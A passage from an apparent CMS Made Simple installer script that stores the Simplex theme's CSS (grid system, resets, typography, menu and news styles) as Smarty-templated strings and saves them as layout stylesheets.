1px;\r\n}\r\n\r\n[[* /*\r\n * Extends the .visuallyhidden class to allow the element to be focusable\r\n * when navigated to via the keyboard: h5bp.com/p\r\n */ *]]\r\n\r\n.visuallyhidden.focusable:active, .visuallyhidden.focusable:focus {\r\n	clip: auto;\r\n	height: auto;\r\n	margin: 0;\r\n	overflow: visible;\r\n	position: static;\r\n	width: auto;\r\n}\r\n\r\n[[* /*\r\n * Hide visually and from screenreaders, but maintain layout\r\n */ *]]\r\n\r\n.invisible {\r\n	visibility: hidden;\r\n}\r\n\r\n[[* /*\r\n * Clearfix: contain floats\r\n *\r\n * For modern browsers\r\n * 1. The space content is one way to avoid an Opera bug when the\r\n *    `contenteditable` attribute is included anywhere else in the document.\r\n *    Otherwise it causes space to appear at the top and bottom of elements\r\n *    that receive the `clearfix` class.\r\n * 2. The use of `table` rather than `block` is only necessary if using\r\n *    `:before` to contain the top-margins of child elements.\r\n */ *]]\r\n\r\n.cf:before, .cf:after {\r\n	content: " "; [[* /* 1 */ *]]\r\n	display: table; [[* /* 2 */ *]]\r\n}\r\n\r\n.cf:after {\r\n	clear: both;\r\n}\r\n\r\n[[* /* =====================================\r\n BASE STYLES\r\n ===================================== */ *]]\r\n\r\n[[* /*\r\n * 1. Remove default vertical scrollbar in IE6/7/8/9\r\n * 2. Allow only vertical resizing\r\n */ *]]\r\ntextarea {\r\n	overflow: auto;\r\n	vertical-align: top;\r\n	resize: vertical\r\n}\r\n\r\nul, ol {\r\n	margin: 1em 0;\r\n	padding: 0 0 0 40px\r\n}\r\n\r\ndd {\r\n	margin: 0 0 0 40px\r\n}\r\n\r\nnav ul, nav ol {\r\n	list-style: none;\r\n	list-style-image: none;\r\n	margin: 0;\r\n	padding: 0\r\n}\r\n\r\n[[* /* Redeclare monospace font family */ *]]\r\npre, code, kbd, samp {\r\n	font-family: monospace, serif;\r\n	_font-family: courier new, monospace;\r\n	font-size: 1em\r\n}\r\n\r\n[[* /* Improve readability of pre-formatted text in all browsers */ *]]\r\npre {\r\n	white-space: pre;\r\n	white-space: pre-wrap;\r\n	word-wrap: break-word\r\n}\r\n\r\nq {\r\n	quotes: none\r\n}\r\n\r\nq:before, q:after {\r\n	content: "";\r\n	content: none\r\n}\r\n\r\nsmall {\r\n	font-size: 85%\r\n}\r\n\r\n[[* /* correct text resizing */ *]]\r\nhtml {\r\n	font-size: 100%;\r\n	-webkit-text-size-adjust: 100%;\r\n	-ms-text-size-adjust: 100%\r\n}\r\n\r\nbody {\r\n	margin: 0;\r\n	font-size: 1em;\r\n	-webkit-font-smoothing: antialiased;\r\n}\r\n\r\n[[* /* =====================================\r\n 12 COLUMN GRID\r\n ===================================== */ *]]\r\n\r\n[[* /* ==========================================================================\r\n 12 Column Grid System based on the 1140px Grid V2\r\n by Andy Taylor http://cssgrid.net\r\n\r\n Extended by Goran Ilic http://www.ich-mach-das.at\r\n https://github.com/Stikki/Yetti/blob/master/static/css/yetti-grid.css\r\n ========================================================================== */ *]]\r\n\r\n.container {\r\n	padding-left: 10px;\r\n	padding-right: 10px;\r\n}\r\n\r\n.row {\r\n	width: 100%;\r\n	max-width: 1440px;\r\n	margin: 0 auto;\r\n	position: relative;\r\n}\r\n\r\n.row:before, .row:after, .form-row:before, .form-row:after {\r\n	content: " ";\r\n	display: table;\r\n}\r\n\r\n.row:after, .form-row:after {\r\n	clear: both;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Base 12 Column Grid\r\n ========================================================================== */ *]]\r\n\r\n.full {\r\n	width: 100%;\r\n	display: block;\r\n}\r\n\r\n.half, .third, .two-third, .quarter, .three-quarter, .fifth, .two-fifth, .three-fifth, .four-fifth {\r\n	float: left;\r\n}\r\n\r\n.half {\r\n	width: 50%;\r\n}\r\n\r\n.third {\r\n	width: 33.33%;\r\n}\r\n\r\n.two-third {\r\n	width: 66.66%;\r\n}\r\n\r\n.quarter {\r\n	width: 25%;\r\n}\r\n\r\n.three-quarter {\r\n	width: 75%;\r\n}\r\n\r\n.fifth {\r\n	width: 20%;\r\n}\r\n\r\n.two-fifth {\r\n	width: 40%;\r\n}\r\n\r\n.three-fifth {\r\n	width: 60%;\r\n}\r\n\r\n.four-fifth {\r\n	width: 80%\r\n}\r\n\r\n[[* /* Animate position of columns */ *]]\r\n.row [class*="-col"] {\r\n	-webkit-transition:all .4s ease;\r\n	-moz-transition:all .4s ease;\r\n	-o-transition:all .4s ease;\r\n	-ms-transition:all .4s ease;\r\n	transition:all .4s ease;\r\n}\r\n\r\n@media only screen and (min-width: 768px) {\r\n	\r\n	.container {\r\n		padding-left: 20px;\r\n		padding-right: 20px;\r\n	}\r\n\r\n	[[* /* ==========================================================================\r\n	 Base 12 Column Grid\r\n	 ========================================================================== */ *]]\r\n\r\n	.col, .one-col, .two-col, .three-col, .four-col, .five-col, .six-col, .seven-col, .eight-col, .nine-col, .ten-col, .eleven-col {\r\n		margin-left: 3.8%;\r\n		float: left;\r\n		min-height: 1px;\r\n		position: relative;\r\n	}\r\n	.row .one-col {\r\n		width: 4.85%;\r\n	}\r\n	.row .two-col {\r\n		width: 13.45%;\r\n	}\r\n	.row .three-col {\r\n		width: 22.05%;\r\n	}\r\n	.row .four-col {\r\n		width: 30.75%;\r\n	}\r\n	.row .five-col {\r\n		width: 39.45%;\r\n	}\r\n	.row .six-col {\r\n		width: 48.1%;\r\n	}\r\n	.row .seven-col {\r\n		width: 56.75%;\r\n	}\r\n	.row .eight-col {\r\n		width: 65.4%;\r\n	}\r\n	.row .nine-col {\r\n		width: 74.05%;\r\n	}\r\n	.row .ten-col {\r\n		width: 82.7%;\r\n	}\r\n	.row .eleven-col {\r\n		width: 91.35%;\r\n	}\r\n	.row .twelve-col {\r\n		width: 100%;\r\n		margin-left: 0;\r\n	}\r\n	.row [class*="-col"]:first-child, .row [class*="-col"].first {\r\n		margin-left: 0;\r\n	}\r\n\r\n	[[* /* ==========================================================================\r\n	 Offset Space\r\n	 ========================================================================== */ *]]\r\n\r\n	.row .offset-one {\r\n		margin-left: 8.65% !important;\r\n	}\r\n	.row .offset-two {\r\n		margin-left: 17.25% !important;\r\n	}\r\n	.row .offset-three {\r\n		margin-left: 25.85% !important;\r\n	}\r\n	.row .offset-four {\r\n		margin-left: 34.55% !important;\r\n	}\r\n	.row .offset-five {\r\n		margin-left: 43.25% !important;\r\n	}\r\n	.row .offset-six {\r\n		margin-left: 51.8% !important;\r\n	}\r\n	.row .offset-seven {\r\n		margin-left: 60.55% !important;\r\n	}\r\n	.row .offset-eight {\r\n		margin-left: 69.2% !important;\r\n	}\r\n	.row .offset-nine {\r\n		margin-left: 77.85% !important;\r\n	}\r\n	.row .offset-ten {\r\n		margin-left: 86.5% !important;\r\n	}\r\n	.row .offset-eleven {\r\n		margin-left: 95.15% !important;\r\n	}\r\n\r\n	[[* /* ==========================================================================\r\n	 Push & Pull Space\r\n	 ========================================================================== */ *]]\r\n\r\n	.row .push-one, .row .push-two, .row .push-three, .row .push-four, .row .push-five, .row .push-six, .row .push-seven, .row .push-eight,\r\n	.row .push-nine, .row .push-ten, .row .push-eleven, .row .pull-one, .row .pull-two, .row .pull-three, .row .pull-four, .row .pull-five,\r\n	.row .pull-six, .row .pull-seven, .row .pull-eight, .row .pull-nine, .row .pull-ten, .row .pull-eleven {\r\n		position: relative;\r\n		margin-left: 0;\r\n	}\r\n\r\n	.row .push-one {\r\n		left: 8.65%;\r\n	}\r\n	.row .push-two {\r\n		left: 17.25%;\r\n	}\r\n	.row .push-three {\r\n		left: 25.85%;\r\n	}\r\n	.row .push-four {\r\n		left: 34.55%;\r\n	}\r\n	.row .push-five {\r\n		left: 43.25%;\r\n	}\r\n	.row .push-six {\r\n		left: 51.8%;\r\n	}\r\n	.row .push-seven {\r\n		left: 60.55%;\r\n	}\r\n	.row .push-eight {\r\n		left: 69.2%;\r\n	}\r\n	.row .push-nine {\r\n		left: 77.85%;\r\n	}\r\n	.row .push-ten {\r\n		left: 86.5%;\r\n	}\r\n	.row .push-eleven {\r\n		left: 95.15%;\r\n	}\r\n\r\n	.row .pull-one {\r\n		right: 4.85%;\r\n	}\r\n	.row .pull-two {\r\n		right: 13.45%;\r\n	}\r\n	.row .pull-three {\r\n		right: 22.05%;\r\n	}\r\n	.row .pull-four {\r\n		right: 30.75%;\r\n	}\r\n	.row .pull-five {\r\n		right: 39.45%;\r\n	}\r\n	.row .pull-six {\r\n		right: 48%;\r\n	}\r\n	.row .pull-seven {\r\n		right: 56.75%;\r\n	}\r\n	.row .pull-eight {\r\n		right: 65.4%;\r\n	}\r\n	.row .pull-nine {\r\n		right: 74.05%;\r\n	}\r\n	.row .pull-ten {\r\n		right: 82.7%;\r\n	}\r\n	.row .pull-eleven {\r\n		right: 91.35%;\r\n	}\r\n\r\n}\r\n\r\n[[/strip]]
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Simplex Core');
$css->set_description('Simplex Theme core Stylesheet, containing 12 column grid system and HTML5 resets (normalize.css)');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
[[strip]]\r\n\r\n[[* APPEARANCE *]]\r\n[[* \r\n	/**\r\n	 * @copyright CMS Made Simple 2014\r\n	 * @author Goran Ilic (uniqu3e@gmail.com)\r\n	 * @version 1.1 (CMSMS 2.0 Package)\r\n	 * \r\n	 * Simplex Theme comes with 2 predefined Style variations, one is a "boxed" style as seen in\r\n	 * default installation which is controle with "boxed" ID that is set in Simplex Theme <body> tag.\r\n	 * If you remove this ID, a grey background on page body will be removed and layout will no longer \r\n	 * be wrapped inside a "box" but appear in a single background color which is by default white.\r\n	 * \r\n	 * Besides there are also predefined class names and styles that you can use on <body> tag to\r\n	 * change alignment of complete layout/page.\r\n	 * If you rightaligned class to body (example: <body class='rightaligned and other classes'>) \r\n	 * then whole page layout will be positioned to right window side instead of centered position\r\n	 * and with class leftaligned the page layout will be positioned to left.\r\n	 * \r\n	 * Maximum width of page layout is preset to 1440px in Simplex Core stylesheet, you can change this \r\n	 * by adding a new rule in this stylesheet with a class .row (Example: .row { max-width: 1080px; }).\r\n	 * If you prefer a full width layout simply add fullwidth class to body tag of Simplex Template.  \r\n	 * This class will reset max-width limitation and force the page layout to full window width with\r\n	 * spacing on left and right of 30px.\r\n	 * \r\n	 * Browser Support: \r\n	 * Simplex Theme was tested in common modern Browser and IE8 (with gracefull fallback).\r\n	 * \r\n	 * Grid usage:\r\n	 * Simplex is using a custom Yetti Framework 12 column grid (https://github.com/Stikki/Yetti/tree/master)\r\n	 * based on Andy Taylors (http://cssgrid.net) 1140px Grid.\r\n	 * \r\n	 * Using the grid system is fairly simple. Make sure that grid columns\r\n	 * are wrapped inside a element with .row class.\r\n	 * When grid columns are inside a row element, floats are auto cleared,\r\n	 * therefore you do not need anything like some empty clear element ie. <div class="clear"></div>\r\n	 * Grid columns have a spacing (margin-left) of 3.8% of the layout, whereby first column after\r\n	 * .row opening element will have no spacing (margin-left).\r\n	 * Grid columns are only applied to Browser and Screen size which are greater then 768px;\r\n	 * \r\n	 * Example (three column row):\r\n	 * \r\n	 * <!-- container has a preset padding to left and right with 20px -->\r\n	 * <div class="container">\r\n	 *     <!-- clears floating row of columns, sets maximum width of 1440px -->\r\n	 *     <div class="row some-class-to-apply-styles">\r\n	 *         <!-- \r\n	 *             four-col explanation: a simple math, grid is built out of 12 columns, so we say we want\r\n	 *             a grid column in size of four columns width therefore the name four- and to fill \r\n	 *             our .row it is three times four-col column makes twelve columns (3 x 4 = 12)\r\n	 *         -->\r\n	 *         <div class="four-col my-class">\r\n	 *             Some content\r\n	 *         </div>\r\n	 *         <div class="four-col my-class">\r\n	 *             Some content\r\n	 *         </div>\r\n	 *         <div class="four-col my-class">\r\n	 *             Some content\r\n	 *         </div>\r\n	 *     </div>\r\n	 *     <div class="row">\r\n	 *         <div class="six-col">\r\n	 *             Half width content\r\n	 *         </div>\r\n	 *         <div class="six-col">\r\n	 *             Half width content\r\n	 *         </div>\r\n	 *     </div>\r\n	 * </div>\r\n	 * \r\n	 */ \r\n*]]\r\n\r\n[[* /* assign the images path to a variable */ *]]\r\n[[capture assign='path']][[uploads_url]]/simplex/images[[/capture]]\r\n[[capture assign='font']][[uploads_url]]/simplex/fonts[[/capture]]\r\n\r\n[[* /* --- COLORS --- */ *]]\r\n\r\n[[assign var='light_grey' value='#f1f1f1']]\r\n[[assign var='grey' value='#e9e9e9']]\r\n[[assign var='dark_grey' value='#555' scope=global]]\r\n[[assign var='white' value='#fff']]\r\n[[assign var='orange' value='#f39c2c' scope=global]]\r\n[[assign var='dark_orange' value='#e6870e']]\r\n[[assign var='yellow' value='#fdbd34']]\r\n\r\n[[* /* =====================================\r\n ICON FONT\r\n ===================================== */ *]]\r\n[[* /* Will fail on Windows Phone 7, sorry developer life sucks */ *]]\r\n@font-face {\r\n	font-family: 'simplex';\r\n	src: url('[[\$font]]/simplex.eot');\r\n	src: url('[[\$font]]/simplex.eot?#iefix') format('embedded-opentype'),\r\n		url('[[\$font]]/simplex.woff') format('woff'), \r\n		url('[[\$font]]/simplex.ttf') format('truetype'),\r\n		url('[[\$font]]/simplex.svg#simplex') format('svg');\r\n	font-weight: normal;\r\n	font-style: normal;\r\n}\r\n\r\n[class^="icon-"], [class*=" icon-"] {\r\n	font-family: 'simplex';\r\n	speak: none;\r\n	font-style: normal;\r\n	font-weight: normal;\r\n	font-variant: normal;\r\n	text-transform: none;\r\n	line-height: 1;\r\n	-webkit-font-smoothing: antialiased;\r\n	-moz-osx-font-smoothing: grayscale;\r\n}\r\n\r\n.icon-arrow-up:before {\r\n	content: "\\e600";\r\n}\r\n\r\n.icon-arrow-left:before {\r\n	content: "\\e601";\r\n}\r\n\r\n.icon-search:before {\r\n	content: "\\e603";\r\n}\r\n\r\n.icon-printer:before {\r\n	content: "\\e604";\r\n}\r\n\r\n.icon-linkedin:before {\r\n	content: "\\e605";\r\n}\r\n\r\n.icon-pinterest:before {\r\n	content: "\\e606";\r\n}\r\n\r\n.icon-youtube:before {\r\n	content: "\\e607";\r\n}\r\n\r\n.icon-facebook:before {\r\n	content: "\\e608";\r\n}\r\n\r\n.icon-google:before {\r\n	content: "\\e609";\r\n}\r\n\r\n.icon-twitter:before {\r\n	content: "\\e60a";\r\n}\r\n\r\n.icon-link:before {\r\n	content: "\\e602";\r\n}\r\n\r\n[[* /* =====================================\r\n GENERAL STYLES\r\n ===================================== */ *]]\r\nbody {\r\n	background: [[\$white]];\r\n	font-family: 'Noto Sans', sans-serif;\r\n	font-size: 1em; [[* /* base browser font size: 16px, now do math "XX / 16 = ??" where XX is desired font size */ *]] \r\n	color: [[\$dark_grey]];\r\n	line-height: 1.5;\r\n}\r\n\r\n[[* /* add this class to <body> to align the layout to left instead of centered */ *]]\r\n.leftaligned {\r\n	margin-left: 0;\r\n}\r\n\r\n[[* /* add this class to <body> to align the layout to right instead of centered */ *]]\r\n.rightaligned {\r\n	margin-right: 0;\r\n}\r\n\r\n[[* /* you can change appearance of the page by adding or removing #boxed id to <body> tag. \r\n * By removing #boxed ID, page will no longer be wrapped in a wrapper \r\n */ *]]\r\nbody#boxed {\r\n	background: #f2f2f2 url([[\$path]]/body-background.png) repeat;\r\n}\r\n\r\n[[* /* add this class to <body> to make this layout full window width */ *]]\r\nbody.fullwidth .row {\r\n	max-width: none;\r\n}\r\n\r\na img {\r\n	border: none;\r\n}\r\n\r\n[[* /* you can use these classes to align images to left or right */ *]]\r\n.right {\r\n	float: right;\r\n}\r\n\r\n.left {\r\n	float: left;\r\n}\r\n\r\n[[* /* if image needs some space add this class to img tag\r\n * so at the end a left floating image would be <img src='some.jpg' class='left spacing' alt='foo' />\r\n */ *]]\r\n.spacing {\r\n	margin: 15px;\r\n}\r\n\r\n.spacing.left {\r\n	margin-right: 0;\r\n}\r\n\r\n.spacing.right {\r\n	margin-left: 0;\r\n}\r\n\r\n[[* /* or add a 2 px border to image or something, change as you need it */ *]]\r\n.border {\r\n	border: 2px solid [[\$grey]];\r\n}\r\n\r\n[[* /* some styling for code chunks */ *]]\r\npre, code, kbd, samp {\r\n	font-family: Consolas, 'Andale Mono WT', 'Andale Mono', 'Lucida Console', 'Lucida Sans Typewriter', monospace;\r\n	color: [[\$dark_grey]];\r\n}\r\n\r\npre code {\r\n	line-height: 1.4;\r\n	font-size: .8125em;\r\n}\r\n\r\npre {\r\n	padding: 10px;\r\n	margin: 10px 0;\r\n	overflow: auto;\r\n	width: 93%;\r\n	background: [[\$light_grey]];\r\n	border-radius: 6px;\r\n	-webkit-border-radius: 6px;\r\n	-moz-border-radius: 6px;\r\n	-o-border-radius: 6px;\r\n}\r\n\r\n[[* /* target IE7 and IE6 */ *]]\r\n*:first-child+ html pre {\r\n	padding-bottom: 20px;\r\n	overflow-y: hidden;\r\n	overflow: visible;\r\n	overflow-x: auto;\r\n}\r\n\r\n* html pre {\r\n	padding-bottom: 20px;\r\n	overflow: visible;\r\n	overflow-x: auto;\r\n}\r\n\r\n[[* /* horizontal ruler */ *]]\r\nhr {\r\n	border: solid [[\$grey]];\r\n	border-width: 1px 0 0 0;\r\n	clear: both;\r\n	margin: 10px 0 30px 0;\r\n	height: 0;\r\n}\r\n\r\n[[* /* =====================================\r\n COMMON TYPOGRAPHY\r\n ===================================== */ *]]\r\n\r\n[[* /* link default styles */ *]]\r\na {\r\n	color: [[\$orange]];\r\n}\r\n\r\na.external {\r\n	text-decoration: none;\r\n}\r\n\r\na:visited {\r\n	color: [[\$dark_orange]];\r\n}\r\n\r\na:hover {\r\n	color: [[\$dark_grey]];\r\n	transition: transform .3s ease-out;\r\n	-webkit-transition: color .3s ease-out;\r\n	-moz-transition: color .3s ease-out;\r\n	-o-transition: color .3s ease-out;\r\n	text-decoration: underline;\r\n}\r\n\r\na:focus {\r\n	outline: thin dotted;\r\n}\r\n\r\na:hover, a:active {\r\n	outline: 0;\r\n}\r\n\r\n[[* /* add icon to links with class external */ *]]\r\na.external:after {\r\n	content: "\\e602";\r\n	padding-left: 4px;\r\n	font-family: 'simplex';\r\n	text-decoration: none;\r\n}\r\n\r\n[[* /* default heading styles */ *]]\r\nh1, h2 {\r\n	font-family: 'Oswald', Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;\r\n	font-weight: 700;\r\n}\r\n\r\nh3, h4, h5, h6 {\r\n	font-weight: 400;\r\n}\r\n\r\nh1 {\r\n	color: [[\$orange]];\r\n	margin: 10px 0;\r\n	font-size: 2em; [[* /* 32px */ *]]\r\n	text-transform: uppercase;\r\n}\r\n\r\nh2 {\r\n	color: [[\$dark_grey]];\r\n	font-size: 1.75em; [[* /* 28px */ *]]\r\n}\r\n\r\nh3 {\r\n	color: [[\$dark_grey]];\r\n	font-size: 1.5em; [[* /* 24px */ *]]\r\n}\r\n\r\nh4 {\r\n	color: [[\$orange]];\r\n	font-size: 1.375em; [[* /* 22px */ *]]\r\n}\r\n\r\nh5 {\r\n	font-size: 1.25em [[* /* 20px */ *]]\r\n}\r\n\r\nh6 {\r\n	font-size: 1.125em; [[* /* 18px */ *]]\r\n}\r\n\r\n[[* /* blockquotes and cites */ *]]\r\nblockquote, blockquote p {\r\n	font-size: 1.0625em;\r\n	line-height: 1.5;\r\n	color: [[\$dark_grey]];\r\n	font-style: italic;\r\n	font-family: Georgia, Times New Roman, serif;\r\n}\r\n\r\nblockquote {\r\n	margin: 0 0 20px 0;\r\n	padding: 9px 10px 10px 19px;\r\n	border-left: 5px solid [[\$light_grey]];\r\n}\r\n\r\nblockquote cite {\r\n	display: block;\r\n	font-size: .941176em;\r\n	color: [[\$dark_grey]];\r\n}\r\n\r\nblockquote cite:before {\r\n	content: "\\2014 \\0020";\r\n}\r\n\r\nblockquote cite a, blockquote cite a:visited, blockquote cite a:visited {\r\n	font-family: Georgia, Times New Roman, serif;\r\n}\r\n\r\n[[* /* =====================================\r\n LAYOUT\r\n ===================================== */ *]]\r\n[[* /* wrapping the page in a box */ *]]\r\n.page-wrapper {\r\n	border-top: 5px solid [[\$orange]];\r\n	margin-bottom: 15px;\r\n}\r\n\r\n[[* /* you can switch appearance of the page by adding or removing id #boxed to body tag */ *]]\r\n#boxed #wrapper {\r\n	margin-top: 15px;\r\n	border-top: 5px solid [[\$orange]];\r\n	background: [[\$white]];\r\n	box-shadow: 0 0 15px 0 #c6c6c6;\r\n}\r\n\r\n#boxed.page-wrapper {\r\n	border-top: none;\r\n}\r\n\r\n[[* /* add some spacing to page wrapper */ *]]\r\n.inner-section {\r\n	padding-left: 20px;\r\n	padding-right: 20px;\r\n}\r\n\r\n[[* /* ------ HEADER SECTION ------ */ *]]\r\n\r\n[[* /* the logo */ *]]\r\n.logo {\r\n	margin-top: 20px;\r\n	text-align: center;\r\n}\r\n\r\n.logo a {\r\n	display: block;\r\n}\r\n\r\n.top .header {\r\n	border-bottom: 1px solid [[\$light_grey]];\r\n}\r\n\r\n[[* /* catchphrase */ *]]\r\n.phrase span {\r\n	font-family: 'Oswald', Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;\r\n	text-transform: uppercase;\r\n	color: #ddd;\r\n	font-weight: 700;\r\n	font-size: 1.5em; [[* /* 24px */ *]]\r\n}\r\n\r\n[[* /* search */ *]]\r\n.search {\r\n	text-align: right;\r\n}\r\n\r\n[[* /* webkit browser add icons to input of type search, we dont want it here now */ *]]\r\ninput.search-input::-webkit-search-decoration, input.search-input::-webkit-search-results-button, \r\ninput.search-input::-webkit-search-results-decoration {\r\n	-webkit-appearance: none;\r\n}\r\n\r\n.search .icon-search {\r\n	margin-left: -25px;\r\n	display: inline-block;\r\n	height: 24px;\r\n	line-height: 24px;\r\n	text-align: center;\r\n	width: 24px;\r\n	position: relative;\r\n	z-index: 10;\r\n	color: #ddd;\r\n	top: 3px;\r\n}\r\n\r\n.search ::-webkit-input-placeholder,\r\n.search ::-moz-placeholder,\r\n.search input[placeholder] { \r\n	line-height: normal;\r\n}\r\n\r\n[[* /* styling the search input field */ *]]\r\ninput.search-input {\r\n	border: 1px solid [[\$light_grey]];\r\n	line-height: normal;\r\n	outline: 0;\r\n	padding: 6px 0 6px .5%;\r\n	font-size: .6875em; [[* /* 11px */ *]]\r\n	color: [[\$dark_grey]];\r\n	transition: all .35s ease-in-out;\r\n	-webkit-transition: all .35s ease-in-out;\r\n	-moz-transition: all .35s ease-in-out;\r\n	-o-transition: all .35s ease-in-out;\r\n	max-width: 99.5%;\r\n}\r\n\r\ninput.search-input:focus {\r\n	border: 1px solid [[\$orange]];\r\n	box-shadow: 0 0 3px [[\$orange]];\r\n	-webkit-box-shadow: 0 0 3px [[\$orange]];\r\n	-moz-box-shadow: 0 0 3px [[\$orange]];\r\n	-o-box-shadow: 0 0 3px [[\$orange]];\r\n}\r\n\r\n[[* /* ------ NAVIGATION ------ */ *]]\r\n#main-menu {\r\n	margin-top: 25px;\r\n}\r\n\r\n[[* /* --- FIRST LEVEL --- */ *]]\r\n#main-menu > li {\r\n	display: block;\r\n	border-bottom: 1px dotted [[\$light_grey]];\r\n	position: relative;\r\n}\r\n\r\n#main-menu > li:last-child {\r\n	border-bottom: none;\r\n}\r\n\r\n#main-menu > li > a,\r\n#main-menu > li.sectionheader > span {\r\n	font-family: 'Oswald', Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;\r\n	text-transform: uppercase;\r\n	color: [[\$dark_grey]];\r\n	text-decoration: none;\r\n	font-size: 1.0625em; [[* /* 17px */ *]]\r\n	font-weight: 700;\r\n	cursor: pointer;\r\n	padding: 8px 0;\r\n	display: block;\r\n	position: relative;\r\n}\r\n\r\n#main-menu > li.current > a,\r\n#main-menu > li.current.sectionheader > span,\r\n#main-menu > li:hover > a,\r\n#main-menu > li.sectionheader:hover > span {\r\n	color: [[\$dark_orange]];\r\n}\r\n\r\n[[* /* --- SECOND LEVEL --- */ *]]\r\n#main-menu > li > ul,\r\n#main-menu > li > ul > li > ul [[* /* third level */ *]] {\r\n	position: absolute;\r\n	left: -999em;\r\n}\r\n\r\n#main-menu > li:hover > ul,\r\n#main-menu > li.active > ul,\r\n#main-menu > li > ul > li:hover > ul, [[* /* third level */ *]]\r\n#main-menu > li > ul > li.active > ul {\r\n	position: relative;\r\n	left: 0;\r\n}\r\n\r\n#main-menu > li > ul > li > a,\r\n#main-menu > li > ul > li.sectionheader > span,\r\n#main-menu > li > ul > li > ul > li > a, [[* /* third level */ *]]\r\n#main-menu > li > ul > li > ul > li.sectionheader > span {\r\n	text-decoration: none;\r\n	color: [[\$dark_grey]];\r\n	text-transform: uppercase;\r\n	display: block;\r\n	padding: 4px 0;\r\n}\r\n\r\n#main-menu > li > ul > li:hover > a,\r\n#main-menu > li > ul > li.sectionheader:hover > span,\r\n#main-menu > li > ul > li > ul > li:hover > a,\r\n#main-menu > li > ul > li > ul > li.sectionheader:hover > span {\r\n	color: #999;\r\n}\r\n\r\n[[* /* --- THIRD LEVEL --- */ *]]\r\n#main-menu > li > ul > li > ul > li > a,\r\n#main-menu > li > ul > li > ul > li.sectionheader > span {\r\n	padding-left: 15px;\r\n	font-size: .875em;\r\n	text-transform: none;\r\n}\r\n\r\n[[* /* --- PARENT INDICATOR --- */ *]]\r\n#main-menu > li > a i,\r\n#main-menu > li > ul > li > a i,\r\n#main-menu > li.sectionheader > span i,\r\n#main-menu > li > ul > li.sectionheader > span i {\r\n	float: right;\r\n	position: relative;\r\n	padding-top: 6px;\r\n	-webkit-transform: rotate(0deg);\r\n	-moz-transform: rotate(0deg);\r\n	-ms-transform: rotate(0deg);\r\n	-o-transform: rotate(0deg);\r\n	transform: rotate(0deg);\r\n	-webkit-transition: -webkit-transform 250ms ease-out 0s;\r\n	-moz-transition: -moz-transform 250ms ease-out 0s;\r\n	-o-transition: -o-transform 250ms ease-out 0s;\r\n	transition: transform 250ms ease-out 0s;\r\n}\r\n\r\n#main-menu > li:hover > a i,\r\n#main-menu > li.active > a i,\r\n#main-menu > li > ul > li:hover > a i,\r\n#main-menu > li > ul > li.active > a i,\r\n#main-menu > li.sectionheader:hover > span i,\r\n#main-menu > li.active.sectionheader > span i,\r\n#main-menu > li > ul > li.sectionheader:hover > span i,\r\n#main-menu > li > ul > li.active.sectionheader > span i {\r\n	-webkit-transform: rotate(-90deg);\r\n	-moz-transform: rotate(-90deg);\r\n	-ms-transform: rotate(-90deg);\r\n	-o-transform: rotate(-90deg);\r\n	transform: rotate(-90deg);\r\n}\r\n\r\n[[* /* ------ CONTENT AREA ------ */ *]]\r\n.content-wrapper {\r\n	padding-top: 20px;\r\n}\r\n\r\n.content-top {\r\n	font-family: Georgia, Times New Roman, serif;\r\n	color: [[\$dark_grey]];\r\n	font-style: italic;\r\n	line-height: 20px;\r\n	position: relative;\r\n}\r\n\r\n.content-top .title-border {\r\n	content: '';\r\n	height: 1px;\r\n	display: block;\r\n	width: 100%;\r\n	border-bottom: 1px dotted #ddd;\r\n	position: absolute;\r\n	top: 50%;\r\n}\r\n\r\n[[* /* breadcrumbs */ *]]\r\n.breadcrumb {\r\n	display: inline-block;\r\n	background: [[\$white]];\r\n	width: auto;\r\n	padding-right: 6px;\r\n	z-index: 1;\r\n	position: relative;\r\n}\r\n\r\n.breadcrumb a {\r\n	color: [[\$dark_grey]];\r\n	display: inline-block;\r\n	width: auto;\r\n	background: [[\$white]];\r\n}\r\n\r\n[[* /* print button */ *]]\r\na.printbutton {\r\n	display: none;\r\n}\r\n\r\n\r\n[[* /* news module summary -> content */ *]]\r\n.content .news-summary span.heading {\r\n	display: none;\r\n}\r\n\r\n.content .news-article {\r\n	margin-bottom: 15px;\r\n	padding-bottom: 15px;\r\n	border-bottom: 1px dotted [[\$grey]];\r\n}\r\n\r\n.content .news-summary ul.category-list {\r\n	margin: 15px 0;\r\n}\r\n\r\n.content .news-summary ul.category-list li a, .news-summary ul.category-list li span {\r\n	border-radius: 4px;\r\n}\r\n\r\n.news-summary ul.category-list li span {\r\n	opacity: .4;\r\n}\r\n\r\n[[* /* news module summary -> sitewide (content + sidebar) */ *]]\r\n[[* /* article heading */ *]]\r\n.news-article h2 {\r\n	margin: 0 0 15px 0;\r\n}\r\n\r\n.news-article h2 a {\r\n	font-family: 'Oswald', Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;\r\n	text-transform: uppercase;\r\n	color: [[\$dark_grey]];\r\n	font-size: 16px;\r\n	text-decoration: none;\r\n	font-weight: 700;\r\n}\r\n\r\n[[* /* date circle, well square for IE  */ *]]\r\n.news-article .date {\r\n	background: [[\$orange]];\r\n	color: [[\$white]];\r\n	display: block;\r\n	float: left;\r\n	width: 40px;\r\n	padding: 6px;\r\n	height: 40px;\r\n	border-radius: 26px;\r\n	text-align: center;\r\n	font-family: Georgia, Times New Roman, serif;\r\n}\r\n\r\n.news-article .day {\r\n	font-size: 20px;\r\n	line-height: 1;\r\n	padding-bottom: 2px;\r\n	font-style: italic;\r\n	display: block;\r\n}\r\n\r\n.news-article.month {\r\n	font-size: 11px;\r\n	display: block\r\n}\r\n\r\n[[* /* author and category */ *]]\r\n.news-article .author, .news-article .category {\r\n	font-family: Georgia, Times New Roman, serif;\r\n	display: block;\r\n	padding-left: 60px;\r\n	font-size: 11px;\r\n	font-style: italic;\r\n}\r\n\r\n[[* /* category list on top of summary */ *]]\r\n.news-summary ul.category-list {\r\n	margin: 15px 0 -1px 0;\r\n	padding: 0;\r\n	list-style: none;\r\n}\r\n\r\n.news-summary ul.category-list li {\r\n	float: left;\r\n	display: block;\r\n	width: auto;\r\n	margin-right: 5px;\r\n}\r\n\r\n.news-summary ul.category-list li a, .news-summary ul.category-list li span {\r\n	display: block;\r\n	color: [[\$dark_grey]];\r\n	padding: 4px 8px;\r\n	background: 